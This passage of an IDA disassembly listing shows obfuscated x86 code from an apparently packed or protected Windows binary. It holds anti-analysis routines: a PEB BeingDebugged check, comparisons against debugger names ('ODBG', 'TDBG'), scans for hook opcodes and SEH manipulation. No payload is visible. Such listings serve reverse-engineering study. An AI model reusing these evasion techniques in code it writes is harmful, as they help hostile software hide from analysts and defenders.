; END OF FUNCTION CHUNK FOR sub_42284F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42780F
loc_423585: ; CODE XREF: sub_42780F:loc_423105�j
call nullsub_11
call sub_42574E
mov edx, 0CF0182F6h
call sub_422048
mov ds:dword_42C4A4, eax
jmp loc_424570
; END OF FUNCTION CHUNK FOR sub_42780F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42BA8A
loc_4235A3: ; CODE XREF: sub_42BA8A-6005�j
jz loc_428831
jmp loc_425215
; END OF FUNCTION CHUNK FOR sub_42BA8A
; =============== S U B R O U T I N E =======================================
sub_4235AE proc near ; DATA XREF: sub_42B772-2B8C�o
or eax, eax
jnz loc_42A2BC
call sub_422591
sub_4235AE endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_424475
loc_4235BB: ; CODE XREF: sub_424475+E�j
jmp nullsub_161
; END OF FUNCTION CHUNK FOR sub_424475
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423F43
loc_4235C0: ; CODE XREF: sub_423F43:loc_4246AE�j
mov [ebp+var_4], eax
call nullsub_11
loc_4235C8: ; CODE XREF: sub_42B079:loc_42C414�j
push offset loc_42C444
jmp nullsub_24
; END OF FUNCTION CHUNK FOR sub_423F43
; ---------------------------------------------------------------------------
loc_4235D2: ; CODE XREF: _94j21ax3:loc_429F23�j
jns loc_429E3E
or ecx, edx
jmp loc_42739E
; ---------------------------------------------------------------------------
push edi
push offset sub_423517
jmp loc_428AA3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428BBD
loc_4235EA: ; CODE XREF: sub_428BBD-97B�j
ja loc_42AD25
jb loc_4297E0
loc_4235F6: ; CODE XREF: sub_428BBD:loc_42BDB8�j
or edi, 0F3350ED2h
add edi, 8C4F730h
xchg edi, [esp+4+var_4]
jmp loc_424D3B
; END OF FUNCTION CHUNK FOR sub_428BBD
; ---------------------------------------------------------------------------
mov edx, 0F78D9DBDh
jmp loc_4278B0
; =============== S U B R O U T I N E =======================================
sub_423614 proc near ; CODE XREF: _94j21ax3:00423F1E�j
; sub_423614+86BB�p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0042109B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00421580 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0042228D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00422A56 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00422FE6 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 004230E6 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00423465 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004251E8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004256D0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042665B SIZE 00000025 BYTES
; FUNCTION CHUNK AT 00426D3D SIZE 00000024 BYTES
; FUNCTION CHUNK AT 0042705F SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00428BAC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00429F04 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0042AA55 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042AE88 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042B50E SIZE 00000003 BYTES
; FUNCTION CHUNK AT 0042B822 SIZE 00000004 BYTES
; FUNCTION CHUNK AT 0042BCC0 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 0042C2F8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042C508 SIZE 00000012 BYTES
mov [esp+0], ebx
pop ebx
mov eax, [eax]
pushf
push 9DEE4D2Ch
pop edx
add edx, 1521527Eh
jmp loc_42228D
sub_423614 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
locret_42362C: ; CODE XREF: _94j21ax3:004277D0�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427C35
loc_42362D: ; CODE XREF: sub_427C35+3543�j
jmp loc_424EA5
; END OF FUNCTION CHUNK FOR sub_427C35
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B9CF
loc_423632: ; CODE XREF: sub_42B9CF-529E�j
jmp loc_423A8C
; END OF FUNCTION CHUNK FOR sub_42B9CF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42484C
loc_423637: ; CODE XREF: sub_42484C+2B33�j
jle loc_423D36
pop ebp
jle loc_427082
jle loc_42C444
loc_42364A: ; CODE XREF: _94j21ax3:loc_426AF2�j
push ebx
push 0B0D6A231h
pop ebx
add ebx, 4F6BF4E3h
jmp loc_42B9A0
; END OF FUNCTION CHUNK FOR sub_42484C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4272D8
loc_42365C: ; CODE XREF: sub_4272D8+C�j
mov esp, ebp
push 19840C28h
pop ebp
add ebp, 0E6BE2A4Bh
xchg ebp, [esp+0]
retn
; END OF FUNCTION CHUNK FOR sub_4272D8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4216D0
loc_42366E: ; CODE XREF: sub_4216D0+AE5C�j
jmp loc_42116C
; END OF FUNCTION CHUNK FOR sub_4216D0
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42169F
loc_423674: ; CODE XREF: sub_42169F+9FBB�j
jmp nullsub_148
; END OF FUNCTION CHUNK FOR sub_42169F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42484C
loc_423679: ; CODE XREF: sub_42484C+521B�j
jmp loc_425013
; END OF FUNCTION CHUNK FOR sub_42484C
; ---------------------------------------------------------------------------
loc_42367E: ; CODE XREF: _94j21ax3:00427985�j
jmp loc_42BD74
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42559A
loc_423683: ; CODE XREF: sub_42559A+1A�j
jmp loc_423E20
; END OF FUNCTION CHUNK FOR sub_42559A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429CAE
loc_423688: ; CODE XREF: sub_429CAE-761F�j
rol eax, 7
jmp loc_421C20
; END OF FUNCTION CHUNK FOR sub_429CAE
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_169. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
pushf
mov [esp], eax
mov eax, esp
jmp loc_424F89
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C057
loc_42369C: ; CODE XREF: sub_42C057�j
push 0E2A325BEh
pop eax
add eax, 1D9F0E7Eh
mov eax, [eax]
jmp loc_424834
; END OF FUNCTION CHUNK FOR sub_42C057
; =============== S U B R O U T I N E =======================================
sub_4236AF proc near ; DATA XREF: sub_425934:loc_426455�o
mov eax, [ebp-4]
call nullsub_182
sub_4236AF endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_168. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_4236B8 proc near ; CODE XREF: sub_425A09�j
; FUNCTION CHUNK AT 0042A64F SIZE 00000005 BYTES
push ebp
loc_4236B9: ; CODE XREF: _94j21ax3:00422087�j
push offset sub_42220B
jmp loc_42A64F
sub_4236B8 endp
; ---------------------------------------------------------------------------
ror ebp, 1Fh
jmp sub_427E13
; ---------------------------------------------------------------------------
loc_4236CB: ; CODE XREF: _94j21ax3:00424043�j
jg loc_423097
loc_4236D1: ; CODE XREF: _94j21ax3:loc_42C262�j
push 60C381FEh
pop eax
xor eax, 49102303h
jmp loc_42B088
; =============== S U B R O U T I N E =======================================
sub_4236E2 proc near ; CODE XREF: sub_421799+3�j
; FUNCTION CHUNK AT 004240A0 SIZE 00000005 BYTES
push ebx
push offset sub_429A83
jmp loc_4240A0
sub_4236E2 endp
; ---------------------------------------------------------------------------
locret_4236ED: ; CODE XREF: _94j21ax3:0042BA6B�j
retn
; ---------------------------------------------------------------------------
loc_4236EE: ; CODE XREF: _94j21ax3:00425384�j
jmp loc_42C262
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421689
loc_4236F3: ; CODE XREF: sub_421689+32D0�j
jmp loc_427ED6
; END OF FUNCTION CHUNK FOR sub_421689
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42284F
loc_4236F8: ; CODE XREF: sub_42284F+1802�j
shr ebp, 16h
loc_4236FB: ; CODE XREF: sub_42284F:loc_428E91�j
push 8D2D9384h
pop eax
and eax, ds:4000F0h
xor eax, 43077574h
push offset loc_426DE6
jmp nullsub_118
; END OF FUNCTION CHUNK FOR sub_42284F
; =============== S U B R O U T I N E =======================================
sub_423717 proc near ; CODE XREF: _94j21ax3:004222FC�j
; sub_4284C0+35B4�p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00421CE0 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00427A63 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042AFBC SIZE 00000008 BYTES
xchg ebx, [esp+0]
pop ebx
cmp ax, 20FFh
jz loc_421CE0
xor eax, eax
loc_423727: ; CODE XREF: sub_423717:loc_427A63�j
mov [ebp-5], al
mov al, [ebp-5]
call sub_421CCE
loc_423732: ; CODE XREF: sub_42454E-1655�j
jmp loc_42AFBC
sub_423717 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
mov edx, 20413B0Fh
call sub_4239A5
push edi
mov [esp], eax
jmp loc_423888
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A61F
loc_42374A: ; CODE XREF: sub_42A61F�j
push offset sub_426716
jmp loc_4287AF
; END OF FUNCTION CHUNK FOR sub_42A61F
; =============== S U B R O U T I N E =======================================
sub_423754 proc near ; DATA XREF: sub_4294B3-512B�o
xchg ebx, [esp+0]
jmp sub_425A09
sub_423754 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_221. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B405
loc_42375D: ; CODE XREF: sub_42B405+10�j
call sub_42B856
loc_423762: ; CODE XREF: sub_42284F+9660�j
mov esi, 0C17CF5Fh
not esi
popf
; END OF FUNCTION CHUNK FOR sub_42B405
; START OF FUNCTION CHUNK FOR sub_42284F
loc_42376A: ; CODE XREF: sub_42284F:loc_4274EC�j
lea eax, [ebp-25Ch]
cmp dword ptr [eax], 47424454h
jnz loc_427BB3
jmp loc_4291A4
; ---------------------------------------------------------------------------
loc_423781: ; CODE XREF: sub_42284F:loc_429E74�j
not ebp
popf
jmp loc_422A9A
; END OF FUNCTION CHUNK FOR sub_42284F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_162. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A791
loc_42378A: ; CODE XREF: sub_42A791+10�j
jmp loc_42AE21
; END OF FUNCTION CHUNK FOR sub_42A791
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425539
loc_42378F: ; CODE XREF: sub_425539+3BBC�j
jmp loc_42A7CA
; END OF FUNCTION CHUNK FOR sub_425539
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421402
loc_423794: ; CODE XREF: sub_421402+64D9�j
xor edi, 0CFA5685Dh
add edi, 0EEE670D3h
xchg edi, [esp+10h+var_10]
jmp sub_429F37
; END OF FUNCTION CHUNK FOR sub_421402
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427849
loc_4237A8: ; CODE XREF: sub_427849-4033�j
jz loc_421CE0
mov eax, [ebp-4]
cmp byte ptr [eax], 0E9h
jz loc_421CE0
mov eax, [ebp-4]
jmp loc_42207B
; END OF FUNCTION CHUNK FOR sub_427849
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_224. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_4237C3: ; CODE XREF: _94j21ax3:loc_42585C�j
pop ebx
sub ebx, 0EEE6100Ah
cmp ebx, 4D2A3E12h
jmp loc_42482F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_156. PRESS KEYPAD "+" TO EXPAND]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_198. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421402
loc_4237D7: ; CODE XREF: sub_421402-1E6�j
jmp nullsub_162
; END OF FUNCTION CHUNK FOR sub_421402
; =============== S U B R O U T I N E =======================================
sub_4237DC proc near ; CODE XREF: _94j21ax3:00422720�j
; sub_421047+6E47�p
; FUNCTION CHUNK AT 0042582F SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004280BC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00429DC2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042B37F SIZE 00000005 BYTES
xchg edx, [esp+0]
pop edx
mov eax, [ebp-0Ch]
cmp byte ptr [eax], 0
jnz loc_4280BC
mov eax, [ebp-8]
shl eax, 3
jmp loc_429DC2
sub_4237DC endp ; sp-analysis failed
; ---------------------------------------------------------------------------
jnp locret_427D2E
jmp sub_429EF8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427849
loc_423802: ; CODE XREF: sub_427849:loc_428B97�j
cmp ds:dword_425BD4[eax*4], 0
jz loc_4252B5
mov eax, [ebp-4]
cmp byte ptr [eax], 0CFh
jmp loc_4237A8
; END OF FUNCTION CHUNK FOR sub_427849
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429629
loc_42381B: ; CODE XREF: sub_429629:loc_42BA40�j
pushf
jmp loc_4274F7
; END OF FUNCTION CHUNK FOR sub_429629
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_96. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423C51
loc_423822: ; CODE XREF: sub_423C51+3B1D�j
jmp nullsub_159
; END OF FUNCTION CHUNK FOR sub_423C51
; ---------------------------------------------------------------------------
loc_423827: ; CODE XREF: _94j21ax3:00426784�j
jmp loc_427408
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_151. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42BD30
loc_42382D: ; CODE XREF: sub_42BD30+B�j
jmp nullsub_202
; END OF FUNCTION CHUNK FOR sub_42BD30
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427D53
loc_423832: ; CODE XREF: sub_42A254-8307�j
; sub_427D53+2E90�j
rol eax, 5
call sub_42BA79
loc_42383A: ; CODE XREF: sub_423094+B�j
jmp loc_421E32
; END OF FUNCTION CHUNK FOR sub_427D53
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_117. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
cdq
jmp sub_421CAA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4272E9
loc_423846: ; CODE XREF: sub_4272E9-4EB�j
xor ecx, eax
push edx
loc_423849: ; CODE XREF: sub_4272E9:loc_423A72�j
push edx
push 0B9CEFFEDh
pop edx
or edx, 0AAE0725Dh
jmp loc_429FD5
; END OF FUNCTION CHUNK FOR sub_4272E9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422898
loc_42385B: ; CODE XREF: sub_422898:loc_42434F�j
pop eax
and eax, 538E74BFh
test eax, 40000000h
jmp loc_42345F
; END OF FUNCTION CHUNK FOR sub_422898
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A7A6
loc_42386D: ; CODE XREF: sub_42A7A6-86AF�j
push esi
shl eax, 1Dh
loc_423871: ; CODE XREF: sub_42A7A6:loc_421C2D�j
call sub_429BC2
push 0EEE0CCABh
pop edx
or edx, 897F5AC7h
jmp loc_4217D7
; END OF FUNCTION CHUNK FOR sub_42A7A6
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_70. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_423888: ; CODE XREF: _94j21ax3:00423745�j
jmp loc_42666B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4294B3
loc_42388D: ; CODE XREF: sub_4294B3-524D�j
add edx, ebx
loc_42388F: ; CODE XREF: sub_4294B3:loc_425429�j
lea eax, [ebp-26Fh]
; END OF FUNCTION CHUNK FOR sub_4294B3
; START OF FUNCTION CHUNK FOR sub_429862
loc_423895: ; CODE XREF: sub_429862:loc_428367�j
cmp dword ptr [eax], 4742444Fh
jz loc_42A566
jmp loc_4229EA
; END OF FUNCTION CHUNK FOR sub_429862
; ---------------------------------------------------------------------------
loc_4238A6: ; CODE XREF: _94j21ax3:0042BE78�j
push eax
push 29BC9839h
; START OF FUNCTION CHUNK FOR sub_4294B3
loc_4238AC: ; CODE XREF: sub_4294B3:loc_4297FA�j
pop eax
add eax, 9C5090E0h
jmp loc_421FC4
; END OF FUNCTION CHUNK FOR sub_4294B3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A0CC
loc_4238B8: ; CODE XREF: sub_42A0CC:loc_423911�j
mov eax, large fs:30h
add eax, 2
mov eax, [eax]
or al, al
jz loc_427C89
jmp loc_424A6E
; END OF FUNCTION CHUNK FOR sub_42A0CC
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4238D1 proc near ; CODE XREF: _94j21ax3:004269C6�j
; DATA XREF: _94j21ax3:loc_4277FD�o
; FUNCTION CHUNK AT 004216AE SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0042AD33 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0042B808 SIZE 00000005 BYTES
push ebp
mov ebp, esp
call sub_423BF8
cmp edx, 4E4AC7ADh
jmp loc_42AD33
sub_4238D1 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42678A
loc_4238E4: ; CODE XREF: sub_42678A+1037�j
jz loc_42933E
call sub_4269EC
jnz loc_427DD9
mov ecx, [ebx+edx-4]
or ecx, ecx
jmp loc_429330
; END OF FUNCTION CHUNK FOR sub_42678A
; =============== S U B R O U T I N E =======================================
sub_423900 proc near ; DATA XREF: sub_428DA6-17AA�o
mov cl, [ebp-0Bh]
xor edx, edx
mov dl, [ebp-9]
shr edx, cl
or eax, edx
call sub_42A72D
sub_423900 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_42A0CC
loc_423911: ; CODE XREF: sub_42A0CC+E�j
jmp loc_4238B8
; END OF FUNCTION CHUNK FOR sub_42A0CC
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_79. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_423917 proc near ; DATA XREF: sub_42B396�o
mov [esp+0], ecx
call loc_4280A8
sub_423917 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_428993
loc_42391F: ; CODE XREF: sub_428993-B5A�j
jmp loc_428129
; END OF FUNCTION CHUNK FOR sub_428993
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421047
loc_423924: ; CODE XREF: sub_421047+5BB3�j
jmp loc_42A233
; END OF FUNCTION CHUNK FOR sub_421047
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_137. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4250F7
loc_42392A: ; CODE XREF: sub_4250F7:loc_42B02B�j
rol eax, 0Bh
push eax
retn
; END OF FUNCTION CHUNK FOR sub_4250F7
; ---------------------------------------------------------------------------
loc_42392F: ; CODE XREF: _94j21ax3:004293A6�j
jmp locret_42A763
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42972F
loc_423934: ; CODE XREF: sub_42972F-61DE�j
jmp loc_42B4AF
; END OF FUNCTION CHUNK FOR sub_42972F
; ---------------------------------------------------------------------------
loc_423939: ; DATA XREF: sub_4221B8:loc_426E03�o
not ecx
pop edx
mov ecx, offset sub_425758
; START OF FUNCTION CHUNK FOR sub_4294B3
loc_423941: ; CODE XREF: sub_4294B3+2A0D�j
xchg ecx, [esp+0Ch+var_C]
retn
; END OF FUNCTION CHUNK FOR sub_4294B3
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_2. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42284F
loc_423946: ; CODE XREF: sub_42284F+791C�j
jmp loc_4224A2
; END OF FUNCTION CHUNK FOR sub_42284F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426744
loc_42394B: ; CODE XREF: sub_426744-4935�j
jmp loc_429DAC
; END OF FUNCTION CHUNK FOR sub_426744
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423324
loc_423950: ; CODE XREF: sub_423324-1C26�j
; sub_423324-19E4�j
push offset sub_421114
jmp loc_424094
; END OF FUNCTION CHUNK FOR sub_423324
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422764
loc_42395A: ; CODE XREF: sub_422764+A�j
pop ebx
and ebx, 17E3C8C7h
cmp ebx, 66CF5886h
jmp loc_426F0A
; END OF FUNCTION CHUNK FOR sub_422764
; ---------------------------------------------------------------------------
sub ecx, 1F6FFF23h
; START OF FUNCTION CHUNK FOR sub_42B9CF
loc_423972: ; CODE XREF: sub_42B9CF:loc_421CBB�j
pushf
jmp sub_42A092
; END OF FUNCTION CHUNK FOR sub_42B9CF
; ---------------------------------------------------------------------------
add ebp, edx
jmp sub_429C48
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42284F
loc_42397F: ; CODE XREF: _94j21ax3:00423232�j
; sub_42284F+85AF�j
jle loc_426F12
cdq
cmp ebx, esi
jmp loc_421F6F
; END OF FUNCTION CHUNK FOR sub_42284F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423324
loc_42398D: ; CODE XREF: sub_423324:loc_42341C�j
jnz loc_4297D4
loc_423993: ; CODE XREF: sub_42AB30-5DA9�j
jmp nullsub_19
; END OF FUNCTION CHUNK FOR sub_423324
; ---------------------------------------------------------------------------
sub eax, edi
jmp loc_421F39
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_209. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A5A2
loc_4239A0: ; CODE XREF: sub_42A5A2+C�j
jmp loc_428CC4
; END OF FUNCTION CHUNK FOR sub_42A5A2
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4239A5 proc near ; CODE XREF: sub_421013+E�p
; sub_42BB39-AAD7�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00421F58 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042475E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00429F78 SIZE 00000005 BYTES
push ebp
mov ebp, esp
jo sub_4259BF
add esp, 0FFFFFED8h
mov [ebp+var_8], edx
mov [ebp+var_4], eax
jmp loc_429F78
sub_4239A5 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427F1C
loc_4239BF: ; CODE XREF: sub_427F1C+5�j
call sub_42B0C9
; END OF FUNCTION CHUNK FOR sub_427F1C
; START OF FUNCTION CHUNK FOR sub_421D33
loc_4239C4: ; CODE XREF: sub_421D33+A842�j
jmp sub_4239A5
; END OF FUNCTION CHUNK FOR sub_421D33
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425983
loc_4239C9: ; CODE XREF: sub_425983+1D�j
jmp loc_4247FB
; END OF FUNCTION CHUNK FOR sub_425983
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421388
loc_4239CE: ; CODE XREF: sub_421388+6�j
jmp loc_42B0E6
; END OF FUNCTION CHUNK FOR sub_421388
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B706
loc_4239D3: ; CODE XREF: sub_42B706:loc_42A1B0�j
jnz loc_4239DF
mov eax, [ebp-4]
mov [ebp-8], eax
; END OF FUNCTION CHUNK FOR sub_42B706
; START OF FUNCTION CHUNK FOR sub_423284
loc_4239DF: ; CODE XREF: sub_42B706:loc_4239D3�j
; sub_423284+8471�j ...
call sub_42BFE5
mov [ebp-0Ah], al
loc_4239E7: ; CODE XREF: sub_425808:loc_421D20�j
push offset loc_422BEE
jmp loc_4219BC
; END OF FUNCTION CHUNK FOR sub_423284
; =============== S U B R O U T I N E =======================================
sub_4239F1 proc near ; CODE XREF: _94j21ax3:00427E42�j
; _94j21ax3:loc_42AB85�p
; FUNCTION CHUNK AT 00421262 SIZE 0000000A BYTES
xchg ebx, [esp+0]
pop ebx
call sub_42574E
mov edx, 4CB976E9h
call sub_4239A5
push eax
jmp loc_421262
sub_4239F1 endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_48. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424692
loc_423A0B: ; CODE XREF: sub_424692+22�j
jmp loc_422F8F
; END OF FUNCTION CHUNK FOR sub_424692
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A0CC
loc_423A10: ; CODE XREF: sub_42A0CC-242B�j
add eax, 0DD56979Ch
mov eax, [eax]
test eax, 70h
jz loc_4298E4
jmp loc_42699B
; END OF FUNCTION CHUNK FOR sub_42A0CC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42430C
loc_423A28: ; CODE XREF: sub_42430C+49D1�j
call sub_42296F
; END OF FUNCTION CHUNK FOR sub_42430C
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_61. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4257BC
loc_423A2E: ; CODE XREF: sub_4257BC+F�j
jmp loc_428593
; END OF FUNCTION CHUNK FOR sub_4257BC
; =============== S U B R O U T I N E =======================================
sub_423A33 proc near ; DATA XREF: sub_4264AF+6�o
; FUNCTION CHUNK AT 00421353 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00424330 SIZE 00000005 BYTES
mov eax, ds:dword_42C214
or eax, eax
jnz loc_421362
call sub_42574E
mov edx, 7DA6ACC0h
loc_423A4B: ; CODE XREF: _94j21ax3:loc_42596F�j
call sub_4239A5
push eax
jmp loc_424330
sub_423A33 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_423A56 proc near ; DATA XREF: _94j21ax3:loc_42A088�o
; FUNCTION CHUNK AT 00425847 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004263E6 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 004274DB SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00428600 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004289AE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428E53 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042AF2D SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0042BBD0 SIZE 0000000E BYTES
cmp dword ptr [eax+3Ch], 0
jz loc_423E68
jmp loc_428E53
sub_423A56 endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_143. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42BC17
loc_423A66: ; CODE XREF: sub_42BC17+1D�j
jmp sub_4247A2
; END OF FUNCTION CHUNK FOR sub_42BC17
; ---------------------------------------------------------------------------
loc_423A6B: ; CODE XREF: _94j21ax3:00424D2C�j
xchg ecx, [esi]
jmp loc_42745F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4272E9
loc_423A72: ; CODE XREF: sub_4272E9+4FA0�j
jnz loc_423849
jmp loc_422B06
; END OF FUNCTION CHUNK FOR sub_4272E9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AC2D
loc_423A7D: ; CODE XREF: sub_42AC2D:loc_421A95�j
mov [esi], eax
adc ebx, edx
ja loc_42AD4A
jmp loc_42911D
; END OF FUNCTION CHUNK FOR sub_42AC2D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B9CF
loc_423A8C: ; CODE XREF: sub_42B9CF:loc_423632�j
cmp esi, ebp
jmp loc_421CBB
; END OF FUNCTION CHUNK FOR sub_42B9CF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42983E
loc_423A93: ; CODE XREF: sub_42983E+A6E�j
and ebp, 3FE1215Fh
or eax, esi
test edi, ebp
jmp loc_42190B
; END OF FUNCTION CHUNK FOR sub_42983E
; ---------------------------------------------------------------------------
push ebp
jmp loc_4287B9
; ---------------------------------------------------------------------------
rol edx, 17h
jmp loc_429EB7
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_222. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42484C
loc_423AB1: ; CODE XREF: sub_42484C+45B4�j
jmp loc_42735F
; END OF FUNCTION CHUNK FOR sub_42484C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A0CC
loc_423AB6: ; CODE XREF: _94j21ax3:00428D28�j
; _94j21ax3:0042916C�j ...
pop large dword ptr fs:0
push offset sub_42A0C8
jmp loc_4295AB
